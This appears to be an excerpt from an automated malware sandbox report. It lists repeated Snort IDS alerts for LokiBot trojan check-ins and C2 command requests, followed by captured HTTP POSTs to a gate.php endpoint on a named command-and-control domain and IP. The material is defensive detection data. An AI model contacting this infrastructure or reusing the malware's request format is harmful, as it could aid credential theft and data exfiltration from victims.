              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49226
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49227 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49227
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49228 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49228
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49229 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49229
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49230 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49230
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49231 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49231
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49232 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49232
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49233 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49233 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49233 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49233 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49233 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49233
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49234 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49234
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49235 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49235
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49236 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49236
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49237 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49237
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49238 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49238 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49238 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49238 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49238 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49238
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49239 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49239 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49239 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49239 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49239 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49239
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49240 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49240 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49240 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49240 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49240 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49240
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49241 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49241 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49241 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49241 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49241 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49241
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49242 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49242 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49242 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49242 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49242 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49242
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49243 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49243 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49243 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49243 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49243 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49243
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49244 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49244 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49244 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49244 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49244 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49244
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49245 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49245 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49245 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49245 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49245 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49245
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49246 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49246 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49246 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49246 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49246 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49246
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49247 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49247 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49247 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49247 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49247 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49247
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49248 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49248 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49248 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49248 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49248 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49248
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49249 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49249 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49249 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49249 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49249 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49249
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49250 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49250 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49250 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49250 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49250 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.193.143.118:80 -> 192.168.2.22:49250
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49251 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49251 -> 185.193.143.118:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49251 -> 185.193.143.118:80
              Found C&C like URL patternShow sources
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /chud/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: begadi.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: B39EF212Content-Length: 149Connection: close
